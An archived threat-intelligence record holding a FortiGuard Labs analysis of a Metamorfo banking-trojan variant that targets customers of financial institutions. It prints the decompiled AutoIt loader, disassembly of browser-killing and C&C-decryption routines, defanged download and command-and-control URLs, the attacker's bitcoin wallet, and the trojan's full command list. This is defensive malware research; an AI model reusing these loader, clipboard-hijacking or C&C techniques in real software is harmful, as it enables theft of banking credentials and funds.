{
	"id": "4dfdc76f-e1e6-41bf-b134-409374db291a",
	"created_at": "2026-04-06T00:07:51.326787Z",
	"updated_at": "2026-04-10T13:11:44.001335Z",
	"deleted_at": null,
	"sha1_hash": "c4729076cd5b543eb3e49cef5549cb247ebffba8",
	"title": "Another Metamorfo Variant Targeting Customers of Financial Institutions in More Countries",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1001017,
	"plain_text": "Another Metamorfo Variant Targeting Customers of Financial\r\nInstitutions in More Countries\r\nBy Xiaopeng Zhang\r\nPublished: 2020-02-04 · Archived: 2026-04-02 12:01:16 UTC\r\nFortiGuard Labs Threat Analysis\r\nAffected platforms:                   Windows\r\nImpacted parties:                       Online Financial Institutions\r\nImpact:                                      Theft of financial information\r\nSeverity level:                           High\r\nMetamorfo is a malware family that was observed targeting the customers of online financial institutions.\r\nRecently, FortiGuard Labs captured two different Metamorfo variants. We have already published an analysis\r\nblog for the first, which only targets the customers of Brazilian financial institutions. \r\nThis second Metamorfo variant targets the customers of even more financial institutions across multiple countries.\r\nIn this post you can see how it infects the machines of its victims and what it is able to do on a victim’s machine,\r\nincluding how it collects data and communicates with its command and control (C\u0026C) server, as well as what\r\nC\u0026C commands it supports.\r\nStarting from the Captured Sample \r\nThe captured sample used in this analysis is an MSI file named “view-(AVISO)2020.msi” that is spread through a\r\nZIP archive, just as with the previous variant. In the previous analysis, I showed that this MSI file is parsed and\r\nexecuted automatically by MsiExec.exe when a user double clicks on it in Windows OS.\r\nAnalyzing this latest MSI file, I discovered that it also has a stream with the same name –“!_StringData” – where I\r\nfound a piece of JavaScript code that had been mixed in with a huge amount of garbage strings. After I extracted\r\nand de-obfuscated the JavaScript code, it was easy to see what the code does. Figure 1 is a code snippet that shows\r\nthe key functions of that JavaScript code being used.\r\nhttps://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions\r\nPage 1 of 15\n\nFigure 1. JavaScript code snippet extracted from the stream “!_StringData“\r\nIt downloads a file from the URL \"hxxp[:]//www[.]chmsc[.]edu[.]ph/library/modules/down/op57.lts\", which is\r\nactually a ZIP file containing three files. It then gets decompressed into a newly-created random string folder (in\r\nthis case, “RrRbiebL”) under “C:\\”. Also, the three decompressed files are renamed with random strings, which in\r\nthis analysis were “cMejBlQe.exe”, “M6WnYxAh” and “YvSVUyps.dll”.  Figure 2 shows the folder information.\r\nFigure 2. Three decompressed files in a random name folder\r\nThese three files are executed in the command line: \"C:\\RrRbiebL\\cMejBlQe.exe   C:\\RrRbiebL\\M6WnYxAh\r\nC:\\RrRbiebL\\YvSVUyps.dll”. You may have noticed in Figure 1 that it also added itself into the auto-run group in\r\nthe victim’s system registry. This ensure that it runs automatically whenever the infected system starts. Figure 3 is\r\na screenshot of the auto-run item in the system registry, whose value is just the above command line.\r\nhttps://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions\r\nPage 2 of 15\n\nFigure 3. Added into auto-run group in the system registry\r\nAutoIt Script Runs Metamorfo\r\n“C:\\RrRbiebL\\cMejBlQe.exe” is run with the parameters “C:\\RrRbiebL\\M6WnYxAh\r\nC:\\RrRbiebL\\YvSVUyps.dll”. Through my analysis I learned that the file “cMejBlQe.exe” is an AutoIt script\r\nexecution program, whose original name was “AutoIt3.exe”. The file “M6WnYxAh” is a compiled binary AutoIt\r\nscript file (i.e. “.A3X” file), and “YvSVUyps.dll” includes the major body of this Metamorfo variant.\r\nAutoIt has been observed being abused by a number of malware families for malicious purposes in the past. The\r\nreason for using AutoIt could be to bypass antivirus detection.\r\nDecompiling the file “M6WnYxAh” reveals its source code:\r\nSLEEP(2000)\r\n_SLEEP(2000)\r\nSLEEP(2000)\r\n_SLEEP(2000)\r\nGLOBAL $NPYVKYZFH1Z9T8E5CL48UGNZ878HTHO91S63AH=$CMDLINE[1]\r\nGLOBAL\r\n$KPH98S477U6K32TXPN3F8UBVSHZ=DLLOPEN($NPYVKYZFH1Z9T8E5CL48UGNZ878HTHO91S63AH)\r\nDLLCALL($KPH98S477U6K32TXPN3F8UBVSHZ,\"Int\",\"B1OWOEFK3SBYS0ETX4XXHRNV7SZGYFTU\")\r\nFUNC _SLEEP($IDELAY)\r\n            DLLCALL(\"Kernel32.dll\",\"none\",\"Sleep\",\"dword\",$IDELAY)\r\nENDFUNC\r\nIt pauses 8 seconds at first. Then it loads a DLL file from the path $CMDLINE[1], which is the last parameter in\r\nthe command line; i.e. “C:\\RrRbiebL\\YvSVUyps.dll”. It continues to call an export function of the DLL file\r\nhttps://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions\r\nPage 3 of 15\n\nnamed “B1OWOEFK3SBYS0ETX4XXHRNV7SZGYFTU”. After that, the infected victim machine is controlled by\r\nthe DLL code.\r\nAnalysis of the Main Part of Metamorfo\r\nLet’s now take a look at the file “YvSVUyps.dll”. From Figure 4, we can see that the DLL file is protected by the\r\npacker “VMProtect v3.00-3.3.1”. VMProtect is a very strong packer that supports dynamic code protection when\r\nthe target process is running. This creates a big challenge for analysts. For example, all API addresses are hidden\r\nand are dynamically calculated before calling.\r\nFigure 4. Analzying YvSVUyps.dll with an analysis tool\r\nOnce it ran, I dumped the restored real code from memory. By analyzing its ASM code, I also learned that it was\r\ncompiled by Borland Delphi, just like the previous variant I analyzed.\r\nNow it’s time to see what major tasks it will perform on a victim’s system.\r\nAfter the code is restored by VMProtect, the FormCreate() function is called – which can be considered to be the\r\nMain() function.\r\nIt terminates running browsers, such as Microsoft IE, Mozilla Firefox, Google Chrome, Microsoft Edge and\r\nOpera, by killing the following processes: \"iexplore.exe\", \"firefox.exe\", \"chrome.exe\", \"microsoftedge.exe\", and\r\n\"opera.exe\". The process name strings and other most constant strings in the variant are encrypted using the same\r\nmethod as in the previous variant, but with different decryption keys.\r\n[...]\r\n022AE2BA     lea     edx, [ebp+var_30]\r\n022AE2BD     mov     eax, offset a015f924af437_0 \r\nhttps://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions\r\nPage 4 of 15\n\n022AE2C2     call    decrypt_fun     \r\n022AE2C7     mov     edx, [ebp+var_30]\r\n022AE2CA     lea     eax, [ebp+var_2C]\r\n022AE2CD     call    str_copy_Ascii_Unicode\r\n022AE2D2     mov     edx, [ebp+var_2C]     ; de=\u003e  \"iexplore.exe\"\r\n022AE2D5     mov     eax, [ebp+var_4] \r\n022AE2D8     call    _TerminateProcess \r\n022AE2DD     lea     edx, [ebp+var_38]\r\n022AE2E0     mov     eax, offset a5af5093ad16e_0 \r\n022AE2E5     call    decrypt_fun     \r\n022AE2EA     mov     edx, [ebp+var_38]\r\n022AE2ED     lea     eax, [ebp+var_34]\r\n022AE2F0     call    str_copy_Ascii_Unicode ; \r\n022AE2F5     mov     edx, [ebp+var_34]    ; de=\u003e \"firefox.exe\"\r\n022AE2F8     mov     eax, [ebp+var_4] \r\n022AE2FB     call    _TerminateProcess \r\n022AE300     lea     edx, [ebp+var_40]\r\n022AE303     mov     eax, offset aA233cd013efd_0 \r\n022AE308     call    decrypt_fun     \r\n022AE30D     mov     edx, [ebp+var_40]\r\n022AE310     lea     eax, [ebp+var_3C]\r\n022AE313     call    str_copy_Ascii_Unicode ; \r\n022AE318     mov     edx, [ebp+var_3C]    ; de=\u003e \"chrome.exe\"\r\n022AE31B     mov     eax, [ebp+var_4] \r\n022AE31E     call    _TerminateProcess \r\n022AE323     lea     edx, [ebp+var_48]\r\nhttps://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions\r\nPage 5 of 15\n\n022AE326     mov     eax, offset aC9023de11adf_0 \r\n022AE32B     call    decrypt_fun     \r\n022AE330     mov     edx, [ebp+var_48]\r\n022AE333     lea     eax, [ebp+var_44]\r\n022AE336     call    str_copy_Ascii_Unicode ; \r\n022AE33B     mov     edx, [ebp+var_44]     ; de=\u003e \"microsoftedge.exe\"\r\n022AE33E     mov     eax, [ebp+var_4] \r\n022AE341     call    _TerminateProcess \r\n022AE346     lea     edx, [ebp+var_50]\r\n022AE349     mov     eax, offset a84c66187b74f_0 \r\n022AE34E     call    decrypt_fun     \r\n022AE353     mov     edx, [ebp+var_50]\r\n022AE356     lea     eax, [ebp+var_4C]\r\n022AE359     call    str_copy_Ascii_Unicode ; \r\n022AE35E     mov     edx, [ebp+var_4C]    ; de=\u003e \"opera.exe\"\r\n022AE361     mov     eax, [ebp+var_4] \r\n022AE364     call    _TerminateProcess \r\n[...]\r\nThis piece of ASM code shows that it calls a function to decrypt the process name strings and then calls the\r\nfunction _TerminateProcess() to kill all the matched processes from the process list.\r\nIt then modifies several registry key values to disable the IE browser’s functions such as auto-complete, auto-suggest, etc. The disabled keys are: \"Use FormSuggest\", \"FormSuggest Passwords\", \"FormSuggest PW Ask\"\r\nunder the sub-key “HKCU\\Software\\Microsoft\\Internet Explorer\\Main”, and \"AutoSuggest\" under the sub-key\r\n\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\AutoComplete\".\r\nWhat is the purpose of killing the browsers and disabling their auto-complete and auto-suggest functions? This\r\naction forces the victim to hand-enter data without auto-complete, such as whole URLs, along with login-name,\r\npassword, and so on in the browser. This allows the malware’s key logger function to record the largest number of\r\nactions from the victim’s input.\r\nhttps://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions\r\nPage 6 of 15\n\nIt also collects information such as the OS version, Computer Name, installed AV software, and so on from\r\nvictim’s system. \r\nIf it is running on an infected machine for the first time (depending on whether a flag file exists), it sends a POST\r\npacket to its command-and-control (C\u0026C) server informing it that a machine has been infected. Figure 5 shows\r\nthe details of that packet.\r\nFigure 5. Screenshot of a POST packet to the C\u0026C server\r\nThe URL “hxxp[:]//escapuliu[.]com/happynewyear/EYHS2BZM31D225Q.php” was previously decrypted, and\r\nthe body of this packet contains the victim’s system information. Some of the values are base64 encoded. After\r\ndecoding, the data looks like this: \r\nvv=OP57--06-01\u0026vw=\u0026mods=\u0026uname=*********V-PC\u0026cname=N-96\u0026os=Windows 7 Ultimate6.17601-\r\n32\u0026is=\u0026iss=IE.AssocFile.HTM\u0026iav= microsoft security essentials\r\n“vv=OP57--06-01” is the version information of Metamorfo.\r\n“mods=” records whether IBM Trusteer Rapport is running, which is used to protect users from malware.\r\n“uname=*********V-PC” is the victim’s computer name.\r\n“cname=N-96” is a value read out from the system registry.\r\n“os=Windows 7 Ultimate6.17601-32” contains the infected OS version and platform.\r\n“iss=IE.AssocFile.HTM” indicates the victim’s default browser, which in this case is IE.\r\n“iav= microsoft security essentials” is a list of AV software that the victim has installed.\r\nTimer Functions\r\nAs with the previous variant, this one also uses Timers to perform its tasks. At the end of the FormCreate()\r\nfunction it starts two Timers. The first Timer is used to monitor a bitcoin wallet address in the system clipboard,\r\nhttps://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions\r\nPage 7 of 15\n\nand the other is used to detect whether or not the victim is accessing a financial institution website. I will elaborate\r\non both of these below.\r\nBitcoin Address Timer Function\r\nThis function keeps receiving data from the system clipboard and then determines if it is a valid bitcoin wallet\r\naddress. If yes, it overwrites the wallet address with the attacker’s. \r\nFigure 6. Calling the API SetClipboardData() to overwrite the bitcoin wallet address\r\nFigure 6 shows the calling of the API SetClipboardData(), whose second parameter is the attacker’s wallet address\r\n(\"163McXwBrc9S7JzbgegzVuw7QTJ9H1dQj7\") used to replace the original one in the system clipboard. \r\nUsually, users copy\u0026paste the wallet address to make a bitcoin transfer. In this variant, Metamorfo detects and\r\noverwrites the target wallet in the clipboard. In this way, it attempts to make the victim unknowingly transfer their\r\nbitcoin to the attacker’s bitcoin wallet address (\"163McXwBrc9S7JzbgegzVuw7QTJ9H1dQj7\").\r\nFinancial institution Timer Function\r\nIt then calls the API EnumWindows() function to enumerate all windows from the victim’s system. Its\r\nEnumFunc() callback function collects all windows titles and then adds a 14H long random string prefix. One\r\nmixed windows title looks like this:  “{14H long random string}+windows title”. All the mixed windows titles are\r\nadded into a string list box control. It can also collect the page title of an online banking website that the victim\r\nmay access in a browser.\r\nIn the timer function, it then reads out the mixed windows titles from the string list box control, one by one, to\r\nperform string matching against keywords from the targeted financial institutions. There are 32 such keywords\r\nthat are used to enable matching with more than twenty financial institutions in multiple countries, including the\r\nUS, Canada, Peru, Chile, Spain, Brazil, Ecuador, Mexico, and others. For safety reasons, I will not mention the\r\nspecified keywords or the names of the financial institutions being targeted by this malware in this post.\r\nhttps://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions\r\nPage 8 of 15\n\nOnce a window title matches one of the keywords of a targeted financial institution, it connects to the C\u0026C server,\r\nwhose host is different from the one mentioned earlier.\r\nBelow is a code snippet that decrypts the C\u0026C server host string and port number, which are “ssl[.]teamo[.]life”\r\nand “8350”.\r\n[...]\r\n022965F7  lea  eax, [ebp+var_18]\r\n022965FA  mov  edx, ds:dword_235CE2C   ;encrypted host string\r\n02296600  mov  ecx, 0\r\n02296605  call  _WideCharToMultiByte \r\n0229660A  mov  eax, [ebp+var_18]\r\n0229660D  lea  edx, [ebp+var_14]\r\n02296610  call  decrypt_fun   ; de=\u003e \"ssl.teamo.life\"\r\n02296615  mov  edx, [ebp+var_14]\r\n02296618  lea  eax, [ebp+var_10]\r\n0229661B  call  str_Ascii_Unicode\r\n02296620  mov  edx, [ebp+var_10]\r\n02296623  lea  ecx, [ebp+var_C]\r\n02296626  mov  eax, [ebp+var_4]\r\n02296629  call  sub_2296470  ; gethostbyname\r\n0229662E  mov  edx, [ebp+var_C]\r\n02296631  mov  eax, [ebp+var_4]\r\n02296634  mov  eax, [eax+3DCh]\r\n0229663A  call  sub_20BF29C\r\n0229663F  lea  eax, [ebp+var_24]\r\n02296642  mov  edx, ds:dword_235CE30  ;encrypted port number\r\n02296648  mov  ecx, 0\r\n0229664D  call  _WideCharToMultiByte \r\nhttps://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions\r\nPage 9 of 15\n\n02296652  mov   eax, [ebp+var_24]\r\n02296655  lea   edx, [ebp+var_20]\r\n02296658  call  decrypt_fun   ;; de=\u003e \"8350\"\r\n0229665D  mov   edx, [ebp+var_20]\r\n[...]\r\nCommand and Control with C\u0026C Server \r\nWhen a connection is established with the C\u0026C Server, it sends the command “\u003c|QFUNHSNXU|\u003e” to the server\r\nand waits for control commands to come back to execute further functions on the victim’s system.\r\nFollowing is an example communication between Metamorfo and its C\u0026C server. \r\n\u003c|QFUNHSNXU|\u003e\r\n\u003c|PT|\u003e\r\n\u003c|tksN|\u003eOP57--06-01-N-96\u003c|\u003e32 - Windows 7 Ultimate6.17601\u003c|\u003e********-PC - microsoft security essentials-L4N4c10n\u003c|\u003e********-PC\u003c\u003c|2//\u0026ikILVm9ZtX!L4N4c10n\r\nMetamorfo sent “\u003c|QFUNHSNXU|\u003e” to the server, and then received the control command “\u003c|PT|\u003e” back from\r\nthe server and executed the code for this command. As you can see, it then sent the response packet “\u003c|tksN|\u003e”,\r\nwhich contains the Metamorfo version, system version, platform information, the victim’s computer name, any\r\ninstalled AV software, the identifier string of the matched financial institution name (“L4N4c10n”), and so on. \r\nNOTE: in a packet, the symbol “\u003c|\u003e” is kind of a delimiter, while “\u003c\u003c|” is an end symbol.\r\nAs with the previous variant, this Metamorfo client uses the SocketRead() function to receive and process the\r\ncontrol commands from the C\u0026C server for this socket. \r\nThis Metamorfo variant supports 119 control commands in total. Here they are:\r\n\"\u003c|YuiqkwSgot|\u003e\", \"\u003c|PT|\u003e\", \"\u003c|VOTM|\u003e\", \"\u003c|Gpsxi|\u003e\", \"\u003c|ZKXAKYWQKEHUGZJ|\u003e\", \"\u003c|lozyw|\u003e\", \"\r\n\u003c|SuaykRJ|\u003e\", \"\u003c|SuaykJI|\u003e\", \"\u003c|ztUjzwtR|\u003e\", \"\u003c|IXjzwtR|\u003e\", \"\u003c|Folder|\u003e\", \"\u003c|Files|\u003e\", \"\r\n\u003c|DownloadFile|\u003e\", \"\u003c|UploadFile|\u003e\", \"dkxqdpdv\", \"fuobhjh\", \"pyfsqtpofn\", \"camarinho\", \"beijada\",\r\n\"cidadao\", \"dlulztody\", \"janainaa\", \"nnnaewhwf23nvcxx\", \"vanuza\", \"vanessa\", \"carmena\", \"petereca\",\r\n\"jpevtpjevtjte\", \"djqduidxorv\", \"dulhkqzprf\", \"vaidamole\", \"vadiadaum\", \"lzyxyzoxzdy\",\r\n\"baraomagao\", \"IbqJxbxma\", \"Lmatqo\", \"puplY\", \"hajluvjlY\", \"wlylajhyhJ\", \"gsxuymrle\",\r\n\"sjemwbgonehjexhjjexhjxh\", \"phjdqdfdv\", \"madona\", \"LkingWajuGhkzwu\", \"vkbAlcvtlY\",\r\n\"JtxyXLWA\", \"urpdzchlrdi\", \"JXyhylipS\", \"ndsoiu43098s\", \"snis4duo3098\", \"ki74yfhsag\", \"KxvoJJ\",\r\n\"Bwilmakx\", \"semvergonha\", \"mh42jkrxc3\", \"BwiAivbi\", \"vBiAiiwbwew\", \"Bwiqbi\", \"kdaf4w84fds\",\r\n\"iru4837fbcz\", \"apqi398wjx\", \"Bwiaqk\", \"mfklsjfk3049jsfd\", \"Bwikmn\", \"vpupqbd\", \"ulrvAkhyI\",\r\n\"posseco\", \"jpwhslAzvsI\", \"ihAhaP\", \"dsefsdfds342342\", \"massonaria\", \"kldiu4324987dyyds\",\r\nhttps://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions\r\nPage 10 of 15\n\n\"iejdskdjkfl3426232hdshdhs\", \"maconha\", \"cnirhx87ds\", \"b9f8vnh3f7dhvsja4\", \"ihAwpMhauhW\",\r\n\"nhfjds98743hvfavb\", \"mfki73t1dav\", \"fodiufjdo834yfdgf\", \"f9ksa8iuvdo\", \"miwey82fqq\", \"oropeiru23\",\r\n\"kmcjds09498\", \"ewaewqrtrrmwoa\", \"m94ufasjczbal\", \"ulzcecrvAkhocpgyI\", \"hslfasreweyI\", \"perebao\",\r\n\"japones3fadhh\", \"uhkozphslAzvsI\", \"HruxWkrgHHMqgbkgs\", \"kxsHqddeuMHgHrbgrWgk\",\r\n\"bisurdor\", \"curvaduru\", \"vvjpwulw\", \"bosteiro\", \"lkfjasofu4343849\", \"fkvoiudas98\", \"coichzbz\",\r\n\"b98djzc\", \"klfjs943jfs\", \"eaqeutmn5r\", \"cracreuz\", \"guilhermina\", \"ztchrhAhaP\", \"IIzvsI\",\r\n\"HAPzvsI\", \"juventude\", \"HAUHWzvsI\", \"KHYIzvsI\", \"jpwzvsI\", \"mljzvsI\", \"hruxyoiu\",\r\n\"COZUMEL\", \"COZUMARIA\", \"LMAimwc\", \"baci83427daca\", \"daa243bi78acc\".\r\nThe following table lists most of the control commands for the main socket, along with their descriptions. From it\r\nyou are able to discover what actions Metamorfo variant can perform on a victim’s machine.\r\nCommand Description\r\n\u003c|YuiqkwSgot|\u003e Sets the sub-command used for “\u003c|DownloadFile|\u003e”\r\n\u003c|PT|\u003e\r\nAsks for basic information of the victim’s system and the triggered financial name\r\nidentifier.\r\n\u003c|VOTM|\u003e Sends packets \"\u003c|LSTU|\u003e\" to the server. Functions like a heartbeat.\r\n\u003c|Gpsxi|\u003e Closes all sockets that have connected to the C\u0026C server.\r\n\u003c|lozyw|\u003e Restarts a specified socket.\r\n\u003c|SuaykJI|\u003e Performs a double-click at a specified position.\r\n\u003c|ztUjzwtR|\u003e Moves the cursor to a specific position.\r\n\u003c|IXjzwtR|\u003e  Performs a right click at a specified position.\r\n\u003c|Folder|\u003e Searches folders using given keywords and sends the result to the C\u0026C server.\r\nhttps://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions\r\nPage 11 of 15\n\n\u003c|Files|\u003e Searches files using given keywords and send the results to the C\u0026C server.\r\n\u003c|DownloadFile|\u003e\r\nDownloads a file from the C\u0026C server, depending on the\r\ncommand \u003c|YuiqkwSgot|\u003e.\r\n\u003c|UploadFile|\u003e Uploads a file onto the C\u0026C server.\r\ndkxqdpdv Shows the victim a MessageBox with coaxing information.\r\nvanuza Restarts some sockets.\r\nvanessa Displays a fake message to the victim asking them to enter a confirmation code.\r\ncarmena\r\nThis command has multiple sub-commands to simulate the victim typing characters\r\nthat are from the command packet into a text box.\r\njpevtpjevtjte\r\nDownloads an MSI file from the C\u0026C server and executes it. It can also update\r\nitself.\r\ndjqduidxorv Resets the switch-file. Delete files and related folders. \r\nbaraomagao Make all running browsers (IE, Chrome and Firefox) maximize their windows.\r\nIbqJxbxma,\r\nhajluvjlY\r\nMakes the system taskbar visible.\r\nLmatqo Shuts down the infected system.\r\npuplY Reboots the infected system.\r\nhttps://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions\r\nPage 12 of 15\n\nwlylajhyhJ Plays the \"SYSTEMSTART\" sound by calling the API PlaySoundW().\r\nLkingWajuGhkzwu Closes sockets and exits Metamorfo.\r\nvkbAlcvtlY Runs a .bat file to delete files.\r\nJtxyXLWA Deletes a .dll file and shuts down the system.\r\nurpdzchlrdi\r\nThese commands are related. They could start threads and then manipulate those\r\nthreads to control the victim's input, including mouse and keyboard. \r\nFor example, it is able to block the victim's mouse actions (click, double click, select\r\ntext, right click. and so on) on a browser.\r\nJXyhylipS\r\nndsoiu43098s\r\nsnis4duo3098\r\nki74yfhsag\r\nKxvoJJ here are more than 50 commands here, but I only listed 7 of them here as an\r\nexample.\r\nThey can make the system taskbar and mouse cursor invisible, display a control such\r\nas a canvas showing the victim’s information; ask the victim to enter something like\r\npassword, etc.\r\nSome commands also run a Timer to keep killing \"Windows Task Manager\".\r\nBwilmakx\r\nsemvergonha\r\nmh42jkrxc3\r\nBwiAivbi\r\nvBiAiiwbwew\r\nhttps://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions\r\nPage 13 of 15\n\nBwiqbi\r\nvpupqbd Restores all the status that the above commands changed.\r\nIIzvsI Creates a file under the user profile folder.\r\nCOZUMEL Starts a thread to run a key logger on a browser.\r\nCOZUMARIA Stops the key logger and sends the recorded data to the C\u0026C server.\r\nLMAimwc\r\nCloses running browsers, shows the victim a message, then restarts the  victim's\r\nsystem.\r\nHere is an example of the last control command, \"LMAimwc\".  It closes running browsers – including “Microsoft\r\nInternet Explorer”, “Google Chrome”, and “Mozilla Firefox”, displays a message, and then restarts the victim’s\r\nsystem. Figure 7, below, shows a screenshot of the message in the Spanish language that I’ve translated it into\r\nEnglish.\r\nFigure 7. The message of the control command \"LMAimwc\".\r\nSolution\r\nhttps://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions\r\nPage 14 of 15\n\nFortinet customers are protected from this Metamorfo variant by FortiGuard’s Web Filtering, AntiVirus, and IPS\r\nservices as follows:\r\nThe related URLs are rated as \"Malicious Websites\" by the FortiGuard Web Filtering service.\r\nThe MSI file is detected as \"W32/Metamorfo\" and blocked by the FortiGuard AntiVirus service.\r\nThe traffic between Metamorfo and its C\u0026C server is detected by the FortiGuard IPS signature\r\n“Trojan.Metamorfo”.\r\nIOCs:\r\nURLs\r\nhxxp[:]//escapuliu[.]com/happynewyear/EYHS2BZM31D225Q.php\r\nhxxp[:]//www[.]chmsc[.]edu[.]ph/library/modules/down/op57.lts\r\nSample SHA-256\r\n[view-(AVISO)2020.msi]\r\nEB1E5EAEA4ECC04B920BBD955C16B17F3D5AC3C580EA266FF5B9D589B8B49E0C\r\nLearn more about FortiGuard Labs threat research and the FortiGuard Security Subscriptions and\r\nServices portfolio. Sign up for the weekly Threat Brief from FortiGuard Labs. \r\nLearn more about Fortinet’s free cybersecurity training initiative or about the Fortinet Network Security Expert\r\nprogram, Network Security Academy program, and FortiVet program.\r\nSource: https://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions\r\nhttps://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions\r\nPage 15 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions"
	],
	"report_names": [
		"another-metamorfo-variant-targeting-customers-of-financial-institutions"
	],
	"threat_actors": [
		{
			"id": "08c8f238-1df5-4e75-b4d8-276ebead502d",
			"created_at": "2023-01-06T13:46:39.344081Z",
			"updated_at": "2026-04-10T02:00:03.294222Z",
			"deleted_at": null,
			"main_name": "Copy-Paste",
			"aliases": [],
			"source_name": "MISPGALAXY:Copy-Paste",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434071,
	"ts_updated_at": 1775826704,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c4729076cd5b543eb3e49cef5549cb247ebffba8.pdf",
		"text": "https://archive.orkl.eu/c4729076cd5b543eb3e49cef5549cb247ebffba8.txt",
		"img": "https://archive.orkl.eu/c4729076cd5b543eb3e49cef5549cb247ebffba8.jpg"
	}
}